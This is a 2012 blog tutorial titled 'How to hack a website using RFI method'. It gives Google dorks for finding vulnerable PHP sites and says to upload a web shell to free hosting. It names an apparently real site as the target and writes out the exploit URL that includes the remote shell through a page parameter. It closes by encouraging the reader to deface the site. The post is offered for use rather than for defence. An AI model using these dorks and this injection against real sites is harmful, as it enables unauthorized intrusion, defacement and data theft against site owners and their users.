Editor Picks

Welcome to ABHIJEET VISHEN's Blogger Register YourSelf For Ethical Hacking Classes To Be an Expert & Win Prizes"    Register Your Self to Learn Ethical Hacking,Hardware & Networking,HTML,DOT NET,PHP

Tuesday, 12 June 2012

How to hack a website using RFI method


How to hack a website using RFI method


RFI ( Remote File Inclusion ) is a method of injecting the remote file link to the server and get the site access. By this vulnerability attacker can deface or compromise the data from the site.
* Before getting start ( Things required )
  • A shell uploaded in any webhosting try my3gb( dot )com ( Any shell you like )
  • Vulnerable site
  • A sharp brain ;)
Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
How to Hack website using RFI method
After uploading the shell in the hosting get it’s link eg:- username.my3gb.com/shell_name.php . Now it’s for the Vulnerable site.
You can get them by Using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable the link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
now to check whether the site is vulnerable or not you have to put the any site link after ?page= for example :-
http://www.cbspk.com/v2/index.php?page=http://google.com
If it will open google.com in the same page then it’s vulnerable and if it didn’t then check any other site.
Now after getting the vulnerable site replace the http://google.com with your shell link. Now exploit link will be :-
http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?
And add ? also to the link if the site is vulnerable it will embedded the page to the site.
After successfully execution. The only thing left is your creativity Defacing ;)
Hope you enjoyed the tutorial ” How to hack a website using RFI method “  and don’forget to share it 

0 comments:

Post a Comment